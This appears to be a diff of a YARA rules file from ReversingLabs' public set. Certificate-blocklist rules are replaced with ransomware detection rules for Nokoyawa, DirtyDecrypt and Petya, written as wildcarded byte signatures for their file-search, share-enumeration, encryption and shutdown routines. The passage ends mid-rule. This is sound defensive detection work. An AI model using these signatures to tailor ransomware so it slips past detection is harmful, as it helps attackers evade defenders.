 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c88a8543782fc49d8aa68f3fc8052bd3316d10118dfb2ef2eef5006de657b6f1"
+		logic_hash = "85b7d93db06007d0043b1489b532410ccc700cf082b641fff8a09de2ffe9101d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Nokoyawa"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_shares = {
+            48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            48 8D 44 24 ?? 48 89 44 24 ?? 4C 8B 8C 24 ?? ?? ?? ?? 45 33 C0 33 D2 B9 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 7C 24 ?? ?? 74 ?? 33 C0 E9 ?? ?? ?? ?? 8B 44 24 ??
+            8B D0 B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 75 ?? 33 C0
+            E9 ?? ?? ?? ?? 8B 44 24 ?? 44 8B C0 33 D2 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 4C 8D 4C 24
+            ?? 4C 8B 44 24 ?? 48 8D 54 24 ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 7C
+            24 ?? ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? FF C0 89 44 24
+            ?? 8B 44 24 ?? 39 44 24 ?? 73 ?? 48 8B 44 24 ?? 83 78 ?? ?? 75 ?? 8B 44 24 ?? 48 6B
+            C0 ?? 48 8B 4C 24 ?? 48 8B 54 01 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
+            ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 48 6B C0
+            ?? 48 8B 4C 24 ?? 8B 44 01 ?? 83 E0 ?? 83 F8 ?? 75 ?? 8B 44 24 ?? 48 6B C0 ?? 48 8B
+            4C 24 ?? 48 03 C8 48 8B C1 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? EB ?? 81 7C 24 ??
+            ?? ?? ?? ?? 74 ?? EB ?? 81 7C 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF
+            15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15
+        }
+		$find_files_p1 = {
+            FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83
+            E0 ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 84
+            ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48
+            8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ??
+            ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 48 8D 4C 24
+            ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ??
+            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 3D ?? ??
+            ?? ?? 74 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 98 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 3D ?? ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B 8C 24 ??
+            ?? ?? ?? 0F B7 04 41 83 F8 ?? 75 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48
+        }
+		$find_files_p2 = {
+            98 48 8B 8C 24 ?? ?? ?? ?? 0F B7 04 41 83 F8 ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B 8C 24 ?? ?? ?? ??
+            0F B7 04 41 83 F8 ?? 75 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C8 48 98 48 8B
+            8C 24 ?? ?? ?? ?? 0F B7 04 41 83 F8 ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 4C
+            24 ?? E8 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 15 ?? ??
+            ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 75 ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B 4C
+            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48
+            81 C4
+        }
+		$encrypt_files = {
+            48 89 4C 24 ?? 48 83 EC ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 89 44 24 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? B9 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 89 44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24
+            ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4C 24 ??
+            E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 41 B8 ?? ?? ?? ?? 33 D2
+            48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ??
+            48 8B 4C 24 ?? 48 89 48 ?? 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 C7
+            40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ??
+            48 89 48 ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 48 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B 4C 24 ?? 48 89 41 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 41 ??
+            48 8B 44 24 ?? C7 40 ?? ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 C0 ?? 48 8B 94 24 ?? ?? ??
+            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 98 4C 8B C0 48 8D
+            15 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 48 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 C0 ??
+            48 8B D0 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24
+            ?? 48 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 45 33 C9 41 B8
+            ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 50 ?? 48 8B 44 24 ?? 48 8B 48 ?? FF 15 ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? F0 FF 00 48 83 C4 ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Buster Paper Comercial Ltda" and pe.signatures [ i ] . serial == "07:b4:4c:db:ff:fb:78:de:05:f4:26:16:72:a6:73:12" and 1359503999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $enum_shares ) and ( $encrypt_files )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4F8B9A1Ba5E60C754Dbb40Ddee7905E2 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dirtydecrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DirtyDecrypt ransomware."
 		author = "ReversingLabs"
-		id = "9b6ba6bb-a796-59e1-a38b-04d4b60a99a6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "f4d69c3e-a082-5bc9-bf72-4cc330d3de74"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L621-L637"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DirtyDecrypt.yara#L3-L112"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2a0d07d47cd41db5dc170a29607b6c1f2e3b7c0785f83b211f68f9cb9368e350"
+		logic_hash = "eb6a1c376b0739848b523e741d0d1ebdbc87056d51931fb94c744aa094d6479f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DirtyDecrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$dd_ep = {
+            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 BF 00 00 00 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74
+            1F 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB
+            09 8B 4D ?? 83 C1 ?? 89 4D ?? 83 7D ?? ?? 73 15 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 44 95 ?? EB DC 6A ?? 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ??
+            8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A
+            ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C2 ?? ??
+        }
+		$dd_hash = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 D5 00 00 00 83 7D ?? ?? 0F 84 CB 00 00 00 83 7D ?? ?? 0F 84 C1
+            00 00 00 83 7D ?? ?? 0F 84 B7 00 00 00 83 7D ?? ?? 0F 84 AD 00 00 00 83 7D ?? ?? 0F 84 A3 00 00 00 C7 45 ?? ?? ?? ?? ??
+            8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 6F 83 7D ?? ?? 76 2A 6A ?? 6A ?? 8B
+            55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 51 8B 4D ?? 83 E9 ?? 89 4D ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 6A ?? 8B
+            45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 25 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B
+            45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 33 C9 0F 85 74 FF FF FF 83 7D ?? ?? 74 0A 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 8B
+            E5 5D C2 ?? ??
+        }
+		$dd_getkey = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 31 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? 51 6A ?? 8B 55
+            ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 89 45 ?? 8B 45 ?? 8B E5 5D C2 ?? ??
+        }
+		$dd_destroykey = {
+            55 8B EC 83 7D ?? ?? 74 0A 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 5D C2
+        }
+		$dd_importkey = {
+            55 8B EC 51 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 8B 08 51 8B 55 ?? 52 FF 15 ?? ??
+            ?? ?? 8B 45 ?? 8B E5 5D C2 ?? ??
+        }
+		$dd_decrypt = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 22 01 00 00 83 7D ?? ?? 0F 84 18 01 00 00 83 7D ?? ?? 0F 84 0E
+            01 00 00 83 7D ?? ?? 0F 84 04 01 00 00 83 7D ?? ?? 0F 84 FA 00 00 00 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 33 D2
+            F7 75 ?? 0F AF 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 02 03 45 ?? 89 45 ?? 8B 4D ?? 8B 11 03 55 ?? 52 8B 45 ?? 8B
+            08 51 6A ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 02 8B 45 ?? 83 38 ?? 0F 84 A7 00 00 00 8B 4D ?? 8B 11 8B 45 ?? 03 10 89 55 ?? 83
+            7D ?? ?? 74 61 6A ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 45 ??
+            89 45 ?? 8D 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 1D 8B 4D ?? 03 4D ?? 89
+            4D ?? 8B 55 ?? 2B 55 ?? 89 55 ?? 8B 45 ?? 03 45 ?? 89 45 ?? EB 99 83 7D ?? ?? 75 15 8B 4D ?? 89 4D ?? 8B 55 ?? 8B 45 ??
+            2B 02 8B 4D ?? 89 01 EB 18 8B 55 ?? 8B 02 50 8B 4D ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 45 ?? 8B E5 5D C2
+            ?? ??
+        }
+		$dd_encrypt = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 89 01 00 00 83 7D ?? ?? 0F 84 7F 01 00 00 83 7D ?? ?? 0F 84 75
+            01 00 00 83 7D ?? ?? 0F 84 6B 01 00 00 83 7D ?? ?? 0F 84 61 01 00 00 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 8B 4D ?? 83 E9
+            ?? 89 4D ?? 8B 55 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 26 01
+            00 00 8B 55 ?? 3B 55 ?? 76 08 8B 45 ?? 89 45 ?? EB 06 8B 4D ?? 89 4D ?? 8B 55 ?? 89 55 ?? 8B 45 ?? 33 D2 F7 75 ?? 0F AF
+            45 ?? 8B 4D ?? 8B 11 03 D0 03 55 ?? 89 55 ?? 8B 45 ?? 50 8B 4D ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 55 ??
+            83 3A ?? 0F 84 CF 00 00 00 8B 45 ?? 8B 08 8B 55 ?? 03 0A 89 4D ?? 83 7D ?? ?? 0F 84 84 00 00 00 8B 45 ?? 3B 45 ?? 73 08
+            8B 4D ?? 89 4D ?? EB 06 8B 55 ?? 89 55 ?? 8B 45 ?? 89 45 ?? 6A ?? 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B
+            4D ?? 89 4D ?? 8B 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 02 EB 2D 8B
+            45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 55 ?? 03 55 ?? 89 55 ?? 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 4D ?? 03 4D ?? 89 4D ?? E9
+            72 FF FF FF 83 7D ?? ?? 75 16 8B 55 ?? 8B 45 ?? 2B 02 8B 4D ?? 89 01 C7 45 ?? ?? ?? ?? ?? EB 18 8B 55 ?? 8B 02 50 8B 4D
+            ?? 8B 11 52 6A ?? E8 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 45 ?? 8B E5 5D C2 ?? ??
+        }
+		$dd_provparam = {
+            55 8B EC 83 EC ?? 83 7D ?? ?? 0F 84 94 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ??
+            8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 74 3F 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 2A 6A ?? 8D 45 ??
+            50 8B 4D ?? 51 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 10 8B 45 ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B
+            4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 1D 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 E8
+            ?? ?? ?? ?? 8B E5 5D C2 ?? ??
+        }
+		$dd_acquirecontext = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 0B 8B 45 ?? 0D ?? ?? ?? ?? 89 45 ?? C7 45 ??
+            ?? ?? ?? ?? 83 7D ?? ?? 75 07 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 45 ?? 50 6A ?? 6A ?? 6A ?? 8D 4D ?? 51 E8 ?? ?? ??
+            ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 39 8B 45 ?? 83 C8 ?? 50 6A ?? 8B 4D
+            ?? 51 8D 55 ?? 52 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 1A 6A ?? 6A ?? 6A ?? 8D 4D ?? 51 8D 55 ?? 52 FF 15 ?? ?? ?? ??
+            85 C0 75 02 EB 0E 6A ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 9D 8B 45 ?? 8B E5 5D C2 ?? ??
+        }
+		$dd_mrwhite = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 64 01 00 00 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 12 83 3D ?? ?? ?? ?? ?? 74 09 83 3D ?? ?? ?? ?? ?? 75 05 E9 13
+            01 00 00 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 75 05 E9 F0 00 00 00 8B 95
+            ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74
+            05 E9 C0 00 00 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 85 C0 74 09 83 BD ?? ?? ?? ?? ?? 73 05 E9 9B
+            00 00 00 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            75 02 EB 72 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 02 83 C0 ?? 3B 85 ?? ?? ?? ?? 76 02 EB 51 8B 8D ??
+            ?? ?? ?? 83 39 ?? 74 3E 0F B7 95 ?? ?? ?? ?? 83 FA ?? 75 32 8B 85 ?? ?? ?? ?? 8B 08 51 8B 95 ?? ?? ?? ?? 83 C2 ?? 52 6A
+            ?? 8D 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 89 45 ?? 33 C0 0F 85 CD FE FF FF 8D 8D
+            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? 8B E5 5D C2 ?? ??
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NOX Entertainment Co., Ltd" and pe.signatures [ i ] . serial == "4f:8b:9a:1b:a5:e6:0c:75:4d:bb:40:dd:ee:79:05:e2" and 1348617599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $dd_ep at pe.entry_point ) and $dd_hash and $dd_getkey and $dd_destroykey and $dd_importkey and $dd_decrypt and $dd_encrypt and $dd_provparam and $dd_acquirecontext and $dd_mrwhite
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A389B95Ee736Dd13Bc0Ed743Fd74D2F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Petya : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Petya ransomware."
 		author = "ReversingLabs"
-		id = "43cce248-2322-5607-8706-aeab046a30b9"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "93d9fb33-88d1-50ec-bf99-1888201c0ec2"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L639-L655"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Petya.yara#L3-L58"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8b83e4aa47cea7cadf4b4a9f4e044478a62f4233e082fb52f9ed906d80a552aa"
+		logic_hash = "d2adafcb21b627d614eab79e64e2b96ad09fae796d0670452a19490d8781ce99"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Petya"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$entry_point = {
+            55 8B EC 56 8B 75 ?? 57 83 FE ?? 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 8B F8 85 F6 75 ?? E8 ??
+            ?? ?? ?? 8B C7 5F 5E 5D C2
+        }
+		$shutdown_pattern = {
+            55 8B EC 83 EC ?? 8D 45 ?? 56 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0
+            75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 56 56 8D
+            45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 56 56 56 68 ?? ?? ?? ?? FF D0 33 C0 83 C4 ?? 40 5E 8B
+            E5 5D C3
+        }
+		$sectionxxxx_pattern = {
+            83 EC ?? 53 55 8B C2 89 4C 24 ?? 56 57 8B C8 89 44 24 ?? 33 D2 E8 ?? ?? ?? ?? 85 C0
+            74 ?? 0F B7 48 ?? 8B FA 83 C1 ?? 03 C8 0F B7 40 ?? 89 44 24 ?? 85 C0 74 ?? BE ?? ??
+            ?? ?? 2B F1 80 39 ?? 8D 59 ?? 6A ?? 5D 75 ?? 85 ED 74 ?? 0F BE 2C 1E 0F BE 03 43 3B
+            E8 74 ?? 83 C1 ?? 83 EE ?? 47 3B 7C 24 ?? 72 ?? 8B CA 85 C9 74 ?? 8B 51 ?? 8B 5C 24
+            ?? 8B FB 03 54 24 ?? 8B F2 8B 4A ?? A5 83 C1 ?? 03 CA 89 4B ?? A5 A5 8B 43 ?? 8D 72
+            ?? 89 43 ?? 8B 43 ?? 89 43 ?? B8 ?? ?? ?? ?? 89 73 ?? 66 39 01 74 ?? 8B 7A ?? 8B 2A
+            03 7A ?? 74 ?? 33 DB 43 2B DE 33 D2 8D 0C 33 8B C5 F7 F1 30 16 46 4F 75 ?? B2 ?? 5F
+            5E 5D 0F B6 C2 5B 83 C4 ?? C3
+        }
+		$crypt_gen_pattern = {
+            55 8B EC 53 57 8B 7D ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 50 89 1F FF 15 ??
+            ?? ?? ?? 85 C0 75 ?? 6A ?? 58 EB ?? 56 FF 75 ?? 8B 75 ?? 56 FF 75 ?? FF 15 ?? ?? ??
